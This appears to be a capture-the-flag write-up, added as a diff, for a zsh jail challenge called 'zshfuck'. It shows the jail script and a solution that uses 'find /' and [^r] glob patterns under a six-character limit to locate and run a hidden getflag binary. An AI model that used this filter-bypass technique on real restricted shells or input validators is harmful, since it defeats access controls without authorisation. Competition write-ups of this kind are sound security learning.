|
| 1 | +# zshfuck |
| 2 | + |
| 3 | +## problem |
| 4 | + |
| 5 | + |
| 6 | + |
| 7 | +solved this with "HalfInchPunisher" also on the CyberSpace team |
| 8 | + |
| 9 | +## solution |
| 10 | + |
| 11 | +```zsh |
| 12 | +#!/bin/zsh |
| 13 | +print -n -P "%F{green}Specify your charset: %f" |
| 14 | +read -r charset |
| 15 | +# get uniq characters in charset |
| 16 | +charset=("${(us..)charset}") |
| 17 | +banned=('*' '?' '`') |
| 18 | + |
| 19 | +if [[ ${#charset} -gt 6 || ${#charset:|banned} -ne ${#charset} ]]; then |
| 20 | + print -P "\n%F{red}That's too easy. Sorry.%f\n" |
| 21 | + exit 1 |
| 22 | +fi |
| 23 | +print -P "\n%F{green}OK! Got $charset.%f" |
| 24 | +charset+=($'\n') |
| 25 | + |
| 26 | +# start jail via coproc |
| 27 | +coproc zsh -s |
| 28 | +exec 3>&p 4<&p |
| 29 | + |
| 30 | +# read chars from fd 4 (jail stdout), print to stdout |
| 31 | +while IFS= read -u4 -r -k1 char; do |
| 32 | + print -u1 -n -- "$char" |
| 33 | +done & |
| 34 | +# read chars from stdin, send to jail stdin if valid |
| 35 | +while IFS= read -u0 -r -k1 char; do |
| 36 | + if [[ ! ${#char:|charset} -eq 0 ]]; then |
| 37 | + print -P "\n%F{red}Nope.%f\n" |
| 38 | + exit 1 |
| 39 | + fi |
| 40 | + # send to fd 3 (jail stdin) |
| 41 | + print -u3 -n -- "$char" |
| 42 | +done |
| 43 | +``` |
| 44 | + |
| 45 | +we are only allowed to use 6 characters of our choosing (including space and tab) and then we can pass them to the stdin of another process as many times as we want. the goal is to run the getflag binary somewhere on the system |
| 46 | + |
| 47 | +the first thing we can do is to try finding the getflag binary by using `find /` as our charset and `find /` as the command also |
| 48 | + |
| 49 | +first.txt |
| 50 | +``` |
| 51 | +find / |
| 52 | +find / |
| 53 | +``` |
| 54 | + |
| 55 | +```console |
| 56 | +quasar@quasar098:~/wasteland/dice$ cat first.txt | nc mc.ax 31774 | grep getflag |
| 57 | +/app/y0u/w1ll/n3v3r_g3t/th1s/getflag |
| 58 | +``` |
| 59 | + |
| 60 | +for the other payload, we can use `[^r]` to match any character that is not `r`, i think, and then we can just run the binary by using those instead of regular letters in our path |
| 61 | + |
| 62 | +``` |
| 63 | +/[^r][^r][^r]/[^r][^r][^r]/[^r][^r][^r][^r]/[^r][^r][^r][^r]r[^r][^r][^r][^r]/[^r][^r][^r][^r]/[^r][^r][^r][^r][^r][^r][^r] |
| 64 | +``` |
| 65 | + |
| 66 | +this works because each character is not r except for that one character which is r, which we can just use as r |
0 commit comments